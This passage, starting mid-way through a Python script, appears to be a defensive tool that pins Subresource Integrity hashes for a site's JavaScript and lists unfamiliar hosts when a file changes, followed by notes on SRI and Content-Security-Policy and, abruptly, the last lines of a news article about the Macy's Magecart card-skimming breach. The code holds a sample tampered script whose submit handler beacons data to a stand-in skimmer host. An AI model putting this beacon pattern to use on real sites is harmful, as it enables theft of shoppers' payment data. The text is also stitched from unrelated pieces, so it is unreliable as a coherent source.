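# The attacker appends a beacon to a host the site never talks to.
# Constructed; the payload is a placeholder, not form-harvesting code.
TAMPERED_JS = BASELINE_JS + b"""document.addEventListener('submit', function () {
  var d = 'placeholder';
  new Image().src = 'https://skimmer-host.invalid/analysis.php?d=' + d;
});
"""

URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value for a script body: '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def external_hosts(body: bytes, first_party) -> set:
    """Hostnames the script references that are outside the first-party allowlist."""
    hosts = {h.decode("ascii").lower() for h in URL_RE.findall(body)}
    return hosts - set(first_party)


def check_script(name: str, served: bytes, expected_sri: str, first_party=FIRST_PARTY_HOSTS) -> dict:
    """Compare what the origin serves against the pinned SRI hash.

    On drift, list every non-first-party host the changed file names so the
    destination of any new outbound connection is visible at a glance.
    """
    actual = sri_hash(served)
    drifted = actual != expected_sri
    return {
        "file": name,
        "drifted": drifted,
        "expected": expected_sri,
        "actual": actual,
        "external_hosts": sorted(external_hosts(served, first_party)) if drifted else [],
    }


if __name__ == "__main__":
    pinned = sri_hash(BASELINE_JS)   # the value for the <script integrity="..."> attribute
    for body in (BASELINE_JS, TAMPERED_JS):
        print(check_script("ClientSideErrorLog.js", body, pinned))
```

The sha384 value is what goes in the script tag’s integrity attribute, so a browser refuses a modified copy outright; that only helps if the HTML carrying the attribute is not itself among the modified files, which is why a Content-Security-Policy that limits connect-src and img-src to first-party origins is the second layer: it blocks the beacon to an unknown host even when the script itself gets through.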

Macy’s customers who were exposed in the attack (a number was not given) would be well advised to keep a close eye on their bank statements over the next few months or, better yet, have their bank card replaced entirely. ®


Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2019/11/19/macys_magecart_infection/